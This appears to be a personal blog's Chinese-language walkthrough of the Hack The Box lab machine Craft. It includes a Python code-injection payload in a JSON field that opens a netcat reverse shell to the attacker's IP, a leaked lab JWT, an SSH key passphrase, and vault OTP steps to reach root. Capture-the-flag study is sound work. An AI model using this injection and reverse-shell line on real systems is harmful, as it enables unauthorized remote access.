Craft(HTB)

in Study on Htb

转移了OneNote中的文章 还木有配图

信息收集

更改hosts文件 使网站可以正常访问 发现gogs里面有源码 找到用户名密码

brew命令执行

拿到token

{
  "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNTczNjA4NTkzfQ.JnrkPmk7O8l9yaR7rSVWs5WjESH6pzDGTLS9n0Kxwaw"
}

header加入X-Craft-Api-Token

Check 通过 发现brew的post中含有命令执行

{
  "id": 0,
  "brewer": "string",
  "name": "string",
  "style": "string",
  "abv": "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.114 4444 >/tmp/f')"
}

成功弹回shell

敏感信息泄露

然后获取到了(虚假的)root
这个root是docker容器的 所以并没有拿到实际机器的权限
尝试docker逃逸 似乎没有什么用

修改dbtest.py
拿到了3个开发人员的用户名密码
有个憨憨 把.ssh也上传了

https://gogs.craft.htb/gilfoyle/craft-infra  
chmod 0600 id_rsa   
ssh gilfoyle@10.10.10.110 -i id_rsa  
ZEU3N8WNM2rh4T

还上传了vault的敏感信息 vault write ssh/creds/root_otp ip=<靶机ip>

vault ssh root@10.10.10.110
密码为key的值 拿到了真正的root!

© 2021. All rights reserved.

本站总访问量 Web Analytics

Powered by Hydejack v9.1.2 & Moded by ZYA